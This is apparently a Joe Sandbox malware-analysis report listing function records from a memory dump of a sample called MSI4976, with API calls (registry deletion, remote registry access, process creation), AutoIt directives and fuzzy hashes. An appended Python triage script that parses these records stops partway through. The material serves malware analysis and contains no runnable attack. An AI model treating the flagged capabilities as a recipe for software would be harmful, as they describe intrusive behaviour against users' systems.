                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: MessagePost$KeyboardState$Parent
                                        • String ID:
                                        • API String ID: 87235514-0
                                        • Opcode ID: 2ad4c18972969327a2fd97f089918216ddc4b21aa9413fd079bd4a589e636490
                                        • Instruction ID: 9dd09acf6df33793a90618184548a7e1eb61ac0bf686f78b874020958ea401d2
                                        • Opcode Fuzzy Hash: 2ad4c18972969327a2fd97f089918216ddc4b21aa9413fd079bd4a589e636490
                                        • Instruction Fuzzy Hash: E351B2A0D047D63DFB378724CC45BB6BEA96B07304F09C589E1E55A8C6D394EC98D760
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: _wcsncpy$LocalTime
                                        • String ID:
                                        • API String ID: 2945705084-0
                                        • Opcode ID: 612fabb5cd5f597d3e5268a6d76283124b780ea8b2bbcc9c504e5eeb34c7797f
                                        • Instruction ID: 57d1d0cef2ef403ea3474b870788144c3e0b4367f776ad062579db4ac66fc939
                                        • Opcode Fuzzy Hash: 612fabb5cd5f597d3e5268a6d76283124b780ea8b2bbcc9c504e5eeb34c7797f
                                        • Instruction Fuzzy Hash: 7F415E65C2121475CB12EBF4C886ACFB7ECAF09310F908966F514FB121EA70F65587E9
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: @U=u
                                        • API String ID: 0-2594219639
                                        • Opcode ID: 09de140c22c627c54527038fe67a1ff6f1adae5783635aa9c0ea5dd17fcf314b
                                        • Instruction ID: bddfd028e1bd05602ab272c0821f7eac99649145b25f69823cadb887f97c9a71
                                        • Opcode Fuzzy Hash: 09de140c22c627c54527038fe67a1ff6f1adae5783635aa9c0ea5dd17fcf314b
                                        • Instruction Fuzzy Hash: 2041E235910704ABD727EF38CC49FA9BB79EB0A320F165295F81AA72E1C7709D01D760
                                        APIs
                                        • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?), ref: 00383C92
                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00383CBC
                                        • FreeLibrary.KERNEL32(00000000), ref: 00383D71
                                          • Part of subcall function 00383C63: RegCloseKey.ADVAPI32(?), ref: 00383CD9
                                          • Part of subcall function 00383C63: FreeLibrary.KERNEL32(?), ref: 00383D2B
                                          • Part of subcall function 00383C63: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00383D4E
                                        • RegDeleteKeyW.ADVAPI32(?,?), ref: 00383D16
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: EnumFreeLibrary$CloseDeleteOpen
                                        • String ID:
                                        • API String ID: 395352322-0
                                        • Opcode ID: 5cf6d1f7c4b25e5aaa1bd07ffa6d4628cb5d0679ab0f03be573aafb9dd51c7a5
                                        • Instruction ID: cf562e1df427b75592c4f3b9c9845a12c6ac1b289bc35e979e602ec01d95ec7b
                                        • Opcode Fuzzy Hash: 5cf6d1f7c4b25e5aaa1bd07ffa6d4628cb5d0679ab0f03be573aafb9dd51c7a5
                                        • Instruction Fuzzy Hash: 2F311E71901209BFDB16EB94DC89EFFB7BCEF09700F1005AAE512E2251E6749F499B60
                                        APIs
                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00361734
                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0036175A
                                        • SysAllocString.OLEAUT32(00000000), ref: 0036175D
                                        • SysAllocString.OLEAUT32(?), ref: 0036177B
                                        • SysFreeString.OLEAUT32(?), ref: 00361784
                                        • StringFromGUID2.COMBASE(?,?,00000028), ref: 003617A9
                                        • SysAllocString.OLEAUT32(?), ref: 003617B7
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                        • String ID:
                                        • API String ID: 3761583154-0
                                        • Opcode ID: 05ea472fc10363e5778b208b03e619424ae973260aa726d6da357af992abbb30
                                        • Instruction ID: 1b3465b5e8e1a7d3957e1ec791a1ce1fca2c67b876aea44a1f6c84cb0316f460
                                        • Opcode Fuzzy Hash: 05ea472fc10363e5778b208b03e619424ae973260aa726d6da357af992abbb30
                                        • Instruction Fuzzy Hash: CE217479600219AF9B119FA9CC88CFF77ECEB0A360B45C125F915DB254DB74EC418760
                                        APIs
                                          • Part of subcall function 0032CAEE: _memmove.LIBCMT ref: 0032CB2F
                                        • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 0035C684
                                        • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 0035C697
                                        • SendMessageW.USER32(?,00000189,?,00000000), ref: 0035C6C7
                                          • Part of subcall function 00327E53: _memmove.LIBCMT ref: 00327EB9
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: MessageSend$_memmove
                                        • String ID: @U=u$ComboBox$ListBox
                                        • API String ID: 458670788-2258501812
                                        • Opcode ID: 629efa9b7c04b4cfb74bdd8d19155e0463dc6da46947aa3ce6f1b412fd5f37f1
                                        • Instruction ID: 91aad97e87464e2a5926b0d3a7e7a1b62af7c35d1599b67ff00f2e09e0b3b5e8
                                        • Opcode Fuzzy Hash: 629efa9b7c04b4cfb74bdd8d19155e0463dc6da46947aa3ce6f1b412fd5f37f1
                                        • Instruction Fuzzy Hash: D021F371A00204BEDB0AAB64D886DFFB7ACDF06355B155119F822EB1F0DB785E0A9760
                                        APIs
                                          • Part of subcall function 003231B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 003231DA
                                        • lstrcmpiW.KERNEL32(?,?), ref: 00366A2B
                                        • _wcscmp.LIBCMT ref: 00366A49
                                        • MoveFileW.KERNEL32(?,?), ref: 00366A62
                                          • Part of subcall function 00366D6D: GetFileAttributesW.KERNEL32(?,?,00000000), ref: 00366DBA
                                          • Part of subcall function 00366D6D: GetLastError.KERNEL32 ref: 00366DC5
                                          • Part of subcall function 00366D6D: CreateDirectoryW.KERNEL32(?,00000000), ref: 00366DD9
                                        • _wcscat.LIBCMT ref: 00366AA4
                                        • SHFileOperationW.SHELL32(?), ref: 00366B0C
                                        Strings
                                         Memory Dump Source
                                         • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                         • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                         Joe Sandbox IDA Plugin
                                         • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: File$AttributesCreateDirectoryErrorFullLastMoveNameOperationPath_wcscat_wcscmplstrcmpi
                                        • String ID: \*.*
                                        • API String ID: 2323102230-1173974218
                                        • Opcode ID: 0ba60695bc04d3a265837045225e8e56e740478c11f8c0a7a6cb670688f505d4
                                        • Instruction ID: 0f68d951e44b1f00f843e93a99f8e3ab9f64a9d7ddb7396c04b4495d8885d5b5
                                        • Opcode Fuzzy Hash: 0ba60695bc04d3a265837045225e8e56e740478c11f8c0a7a6cb670688f505d4
                                        • Instruction Fuzzy Hash: A53148B18002186ACF52EFB4E845BDDB7B8AF08344F5085DAE505E7145EB359B89CF64
                                        APIs
                                        Strings
                                         Memory Dump Source
                                         • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true (same associated dumps and IDA snapshot hcaresult_3_2_320000_MSI4976.jbxd as the records above)
                                        Similarity
                                        • API ID: __wcsnicmp
                                        • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                        • API String ID: 1038674560-2734436370
                                        • Opcode ID: c95306a619db45502acef1e78bcf345ee7c3a40fef2959b9979df3e07ec7d89a
                                        • Instruction ID: 8d24a1a3ed29bb65715c6003496df4c3f2e9f130f8cebcaf68550d53ad283c35
                                        • Opcode Fuzzy Hash: c95306a619db45502acef1e78bcf345ee7c3a40fef2959b9979df3e07ec7d89a
                                        • Instruction Fuzzy Hash: 8D213B32204A1176D237A6349C06FF773ECDF55300F51C025F9869F589EBA1AA86C395
                                        APIs
                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0036180D
                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00361833
                                        • SysAllocString.OLEAUT32(00000000), ref: 00361836
                                        • SysAllocString.OLEAUT32 ref: 00361857
                                        • SysFreeString.OLEAUT32 ref: 00361860
                                        • StringFromGUID2.COMBASE(?,?,00000028), ref: 0036187A
                                        • SysAllocString.OLEAUT32(?), ref: 00361888
                                         Memory Dump Source
                                         • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true (same associated dumps and IDA snapshot hcaresult_3_2_320000_MSI4976.jbxd as the records above)
                                        Similarity
                                        • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                        • String ID:
                                        • API String ID: 3761583154-0
                                        • Opcode ID: 4415e344a5dbe1111398121f14ea552efed500f832a03b613fcd3300be488c41
                                        • Instruction ID: c5a7ca547898223f8e75eb5301ff283ab229867ae98e66491f474d233cb29b68
                                        • Opcode Fuzzy Hash: 4415e344a5dbe1111398121f14ea552efed500f832a03b613fcd3300be488c41
                                        • Instruction Fuzzy Hash: 3A218335600204AFDB169BB9CC88DBE77ECEF0E360B45C525F915DB6A4DA74EC418B60
                                        APIs
                                        • IsWindowVisible.USER32(?), ref: 0035E9CD
                                        • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0035E9EA
                                        • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0035EA22
                                        • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 0035EA48
                                        • _wcsstr.LIBCMT ref: 0035EA52
                                        Strings
                                         Memory Dump Source
                                         • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true (same associated dumps and IDA snapshot hcaresult_3_2_320000_MSI4976.jbxd as the records above)
                                        Similarity
                                        • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                        • String ID: @U=u
                                        • API String ID: 3902887630-2594219639
                                        • Opcode ID: ad1b359b18a3f94ba969e010b38f9ad72d3491faf00e8789722bc4677fd109fc
                                        • Instruction ID: 8057d9976e2fce8b2df38c624f22cceb1810c1e606c7e586f83611dab0243a64
                                        • Opcode Fuzzy Hash: ad1b359b18a3f94ba969e010b38f9ad72d3491faf00e8789722bc4677fd109fc
                                        • Instruction Fuzzy Hash: 6A2107722042107AEB1B9B399C45E7BBBECDF45750F118029FC09CE0A1DA74DD409250
                                        APIs
                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0035CA86
                                          • Part of subcall function 00327E53: _memmove.LIBCMT ref: 00327EB9
                                        • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 0035CAB8
                                        • __itow.LIBCMT ref: 0035CAD0
                                        • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 0035CAF6
                                        • __itow.LIBCMT ref: 0035CB07
                                        Strings
                                         Memory Dump Source
                                         • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true (same associated dumps and IDA snapshot hcaresult_3_2_320000_MSI4976.jbxd as the records above)
                                        Similarity
                                        • API ID: MessageSend$__itow$_memmove
                                        • String ID: @U=u
                                        • API String ID: 2983881199-2594219639
                                        • Opcode ID: 557b2a18e99296152a609034f116657591ec5062719e4a4e68a983175beeed7f
                                        • Instruction ID: 252fbf15a7890c626a87edf04af62afccb9dab271aa9bca079c145f75a96cf9e
                                        • Opcode Fuzzy Hash: 557b2a18e99296152a609034f116657591ec5062719e4a4e68a983175beeed7f
                                        • Instruction Fuzzy Hash: 9021D4726003147FDB23EA649C46EDE7AA9AF4AB55F011025FD05EB1A1D6B08D4983A0
                                        APIs
                                          • Part of subcall function 0033C619: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0033C657
                                          • Part of subcall function 0033C619: GetStockObject.GDI32(00000011), ref: 0033C66B
                                          • Part of subcall function 0033C619: SendMessageW.USER32(00000000,00000030,00000000), ref: 0033C675
                                        • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 0038A13B
                                        • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0038A148
                                        • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0038A153
                                        • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 0038A162
                                        • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 0038A16E
                                        Strings
                                         Memory Dump Source
                                         • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true (same associated dumps and IDA snapshot hcaresult_3_2_320000_MSI4976.jbxd as the records above)
                                        Similarity
                                        • API ID: MessageSend$CreateObjectStockWindow
                                        • String ID: Msctls_Progress32
                                        • API String ID: 1025951953-3636473452
                                        • Opcode ID: 388d40fd8f4b78e7d139dbeb2c0680b7b35a1a146eeb19d28fb96fcb1ae5c42c
                                        • Instruction ID: 239ac2f850d8129ebf6f05bc76880eac7cec753f9962f95af0d2d10563f91b28
                                        • Opcode Fuzzy Hash: 388d40fd8f4b78e7d139dbeb2c0680b7b35a1a146eeb19d28fb96fcb1ae5c42c
                                        • Instruction Fuzzy Hash: 971182B2150219BFFF169F65CC86EE77F5DEF08798F014215FA48A6090C6769C21DBA0
                                        APIs
                                        • __getptd_noexit.LIBCMT ref: 00344C3E
                                          • Part of subcall function 003486B5: GetLastError.KERNEL32(?,00340127,003488A3,00344673,?,?,00340127,?,0032125D,00000058,?,?), ref: 003486B7
                                          • Part of subcall function 003486B5: __calloc_crt.LIBCMT ref: 003486D8
                                          • Part of subcall function 003486B5: GetCurrentThreadId.KERNEL32 ref: 00348701
                                          • Part of subcall function 003486B5: SetLastError.KERNEL32(00000000,00340127,003488A3,00344673,?,?,00340127,?,0032125D,00000058,?,?), ref: 00348719
                                        • CloseHandle.KERNEL32(?,?,00344C1D), ref: 00344C52
                                        • __freeptd.LIBCMT ref: 00344C59
                                        • RtlExitUserThread.NTDLL(00000000,?,00344C1D), ref: 00344C61
                                        • GetLastError.KERNEL32(?,?,00344C1D), ref: 00344C91
                                        • RtlExitUserThread.NTDLL(00000000,?,?,00344C1D), ref: 00344C98
                                        • __freefls@4.LIBCMT ref: 00344CB4
                                         Memory Dump Source
                                         • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true (same associated dumps and IDA snapshot hcaresult_3_2_320000_MSI4976.jbxd as the records above)
                                        Similarity
                                        • API ID: ErrorLastThread$ExitUser$CloseCurrentHandle__calloc_crt__freefls@4__freeptd__getptd_noexit
                                        • String ID:
                                        • API String ID: 1445074172-0
                                        • Opcode ID: 75977dabdcc1496fa9a388acf8ae3103667c7db7a2e17650e82972c55bccbe3b
                                        • Instruction ID: 2d1297bf8501560dfe4624eb1b2f196146097c8173c93f75660a91bccef0450e
                                        • Opcode Fuzzy Hash: 75977dabdcc1496fa9a388acf8ae3103667c7db7a2e17650e82972c55bccbe3b
                                        • Instruction Fuzzy Hash: 9801D474401701AFC71BBB74D949A0D77E9EF05315B158528F509CF692EF34FC428A51
                                        APIs
                                        • _memset.LIBCMT ref: 0038E14D
                                        • _memset.LIBCMT ref: 0038E15C
                                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,003E3EE0,003E3F24), ref: 0038E18B
                                        • CloseHandle.KERNEL32 ref: 0038E19D
                                        Strings
                                         Memory Dump Source
                                         • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true (same associated dumps and IDA snapshot hcaresult_3_2_320000_MSI4976.jbxd as the records above)
                                        Similarity
                                        • API ID: _memset$CloseCreateHandleProcess
                                        • String ID: $?>$>>
                                        • API String ID: 3277943733-2737797800
                                        • Opcode ID: 44e03ca35c964d74235942858796a7951d1f1fc37b60989c08cc3f034a2e8130
                                        • Instruction ID: 273c663f53aac20f9500cdffbfbe50a98400e4e98261fcfac634a7045ab99336
                                        • Opcode Fuzzy Hash: 44e03ca35c964d74235942858796a7951d1f1fc37b60989c08cc3f034a2e8130
                                        • Instruction Fuzzy Hash: DDF054F2940350BEE6125766AC49FB77AACDB09354F000521FA04DE1D2D3B65E1187A4
                                        APIs
                                        • GetClientRect.USER32(?,?), ref: 0033C6C0
                                        • GetWindowRect.USER32(?,?), ref: 0033C701
                                        • ScreenToClient.USER32(?,000000FF), ref: 0033C729
                                        • GetClientRect.USER32(?,?), ref: 0033C856
                                        • GetWindowRect.USER32(?,?), ref: 0033C86F
                                         Memory Dump Source
                                         • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true (same associated dumps and IDA snapshot hcaresult_3_2_320000_MSI4976.jbxd as the records above)
                                        Similarity
                                        • API ID: Rect$Client$Window$Screen
                                        • String ID:
                                        • API String ID: 1296646539-0
                                        • Opcode ID: ed6f2dc538b2aa623f26f451c45b0b656f7413f01164a96f10511403cec99bdb
                                        • Instruction ID: a3d4e64f899fe3711c7ade9b2ed4922a629e367225c4c4b76effc14a7efec640
                                        • Opcode Fuzzy Hash: ed6f2dc538b2aa623f26f451c45b0b656f7413f01164a96f10511403cec99bdb
                                        • Instruction Fuzzy Hash: 87B12779910249DBDF11CFA8C5807EDB7B5FF08310F15A52AEC5AEB654EB30AA40CB64
                                        APIs
                                         Memory Dump Source
                                         • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true (same associated dumps and IDA snapshot hcaresult_3_2_320000_MSI4976.jbxd as the records above)
                                        Similarity
                                        • API ID: _memmove$__itow__swprintf
                                        • String ID:
                                        • API String ID: 3253778849-0
                                        • Opcode ID: 3cd69ee615229ba2ecfd3414ae9f88e9e9d68840e897ffa2ecb1c29f758a9b95
                                        • Instruction ID: 6bbf3797981e43259045f7f56dbdbf5fdc35f4b2727e3456dcde3c0fcfa5e897
                                        • Opcode Fuzzy Hash: 3cd69ee615229ba2ecfd3414ae9f88e9e9d68840e897ffa2ecb1c29f758a9b95
                                        • Instruction Fuzzy Hash: 9B61AC3051025A9BCF07EF60CC82EFE37A8AF05314F44855AF95A6F296EB34A905CB50
                                        APIs
                                          • Part of subcall function 0032CAEE: _memmove.LIBCMT ref: 0032CB2F
                                          • Part of subcall function 00383AF7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00382AA6,?,?), ref: 00383B0E
                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00382FA0
                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00382FE0
                                        • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00383003
                                        • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0038302C
                                        • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0038306F
                                        • RegCloseKey.ADVAPI32(00000000), ref: 0038307C
                                         Memory Dump Source
                                         • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true (same associated dumps and IDA snapshot hcaresult_3_2_320000_MSI4976.jbxd as the records above)
                                        Similarity
                                        • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                        • String ID:
                                        • API String ID: 4046560759-0
                                        • Opcode ID: 5e444229d1da60776b71bd43a4bfaf5c141012b37f23088f07c424b439f6ac8d
                                        • Instruction ID: 093e73adb7be0afd7dff171fe0beaf778bc36a88c38f1f2cfc5be8845fed0cec
                                        • Opcode Fuzzy Hash: 5e444229d1da60776b71bd43a4bfaf5c141012b37f23088f07c424b439f6ac8d
                                        • Instruction Fuzzy Hash: 6D514A71118310AFC706EF64D885E6FB7E8BF89704F04495DF6868B2A1DB71EA05CB52
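The function records above list each recovered function's API calls (direct calls, plus entries marked "Part of subcall function" that belong to a callee) together with the Similarity fields (API ID, String ID, Opcode ID, Instruction Fuzzy Hash), but the report gives no way to work with them in bulk. The following Python script is an added example, not part of the Joe Sandbox report or its IDA plugin: it parses records in this layout into structured objects, keeps direct calls separate from subcall entries, flags functions whose direct calls hit a watchlist (here the CreateProcessW record and the RegConnectRegistryW/RegEnumValueW record), and compares two records by the set of APIs they call. The SAMPLE text is constructed from two records on this page; the WATCHLIST, the jaccard helper and every function name are this example's own assumptions.

```python
"""Parse Joe Sandbox IDA-plugin function records and triage them by API usage.

Added example, not part of the Joe Sandbox report or its IDA plugin. The
record layout (an "APIs" list of "Name.MODULE(args), ref: ADDR" lines followed
by the Similarity fields) mirrors the report text; SAMPLE is constructed from
two records on the page, and WATCHLIST is an assumption for the demo.
"""
from __future__ import annotations

import re
from dataclasses import dataclass, field
from typing import Optional

# Constructed sample: two records copied in the report's layout.
SAMPLE = """\
APIs
• _memset.LIBCMT ref: 0038E14D
• CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,003E3EE0,003E3F24), ref: 0038E18B
• CloseHandle.KERNEL32 ref: 0038E19D
Strings
Memory Dump Source
• Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
Similarity
• API ID: _memset$CloseCreateHandleProcess
• String ID: $?>$>>
• API String ID: 3277943733-2737797800
• Instruction Fuzzy Hash: DDF054F2940350BEE6125766AC49FB77AACDB09354F000521FA04DE1D2D3B65E1187A4
APIs
  • Part of subcall function 0032CAEE: _memmove.LIBCMT ref: 0032CB2F
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00382FA0
• RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00382FE0
• RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0038302C
• RegCloseKey.ADVAPI32(00000000), ref: 0038307C
Similarity
• API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
• String ID:
• API String ID: 4046560759-0
• Instruction Fuzzy Hash: 6D514A71118310AFC706EF64D885E6FB7E8BF89704F04495DF6868B2A1DB71EA05CB52
"""

# One API call line: optional subcall prefix, Name.MODULE, optional (args), ref: ADDR.
API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]+): )?"
    r"(?P<name>[A-Za-z0-9_@$]+)\.(?P<module>[A-Za-z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?,? ref: (?P<ref>[0-9A-F]+)"
)
# Similarity fields we keep; other bullet lines (Source File, Snapshot File) are ignored.
FIELD_RE = re.compile(
    r"^\s*•\s*(?P<key>API ID|String ID|API String ID|Opcode ID|Instruction ID|"
    r"Opcode Fuzzy Hash|Instruction Fuzzy Hash):\s*(?P<val>.*)$"
)

# Assumed triage watchlist (not from the report): API name -> why it matters.
WATCHLIST = {
    "CreateProcessW": "process creation",
    "RegConnectRegistryW": "remote registry access",
    "RegEnumValueW": "registry value enumeration",
    "SHFileOperationW": "bulk file copy/move/delete",
    "MoveFileW": "file move",
}


@dataclass
class ApiCall:
    name: str
    module: str
    args: str
    ref: str
    via_subcall: Optional[str] = None  # address of the callee, if the call is indirect


@dataclass
class FunctionRecord:
    calls: list[ApiCall] = field(default_factory=list)
    meta: dict[str, str] = field(default_factory=dict)

    def direct_apis(self) -> set[str]:
        """APIs the function itself calls; subcall entries are excluded."""
        return {c.name for c in self.calls if c.via_subcall is None}


def parse_records(text: str) -> list[FunctionRecord]:
    """Split report text into records; each record starts at an 'APIs' header."""
    records: list[FunctionRecord] = []
    current: Optional[FunctionRecord] = None
    for line in text.splitlines():
        if line.strip() == "APIs":
            current = FunctionRecord()
            records.append(current)
            continue
        if current is None:
            continue
        m = API_RE.match(line)
        if m:
            current.calls.append(ApiCall(m["name"], m["module"], m["args"] or "", m["ref"], m["sub"]))
            continue
        m = FIELD_RE.match(line)
        if m:
            current.meta[m["key"]] = m["val"].strip()
    return records


def triage(records: list[FunctionRecord]) -> list[tuple[int, str, list[str]]]:
    """(record index, instruction fuzzy hash, matched watchlist APIs) for each hit."""
    hits = []
    for idx, rec in enumerate(records):
        matched = sorted(rec.direct_apis() & WATCHLIST.keys())
        if matched:
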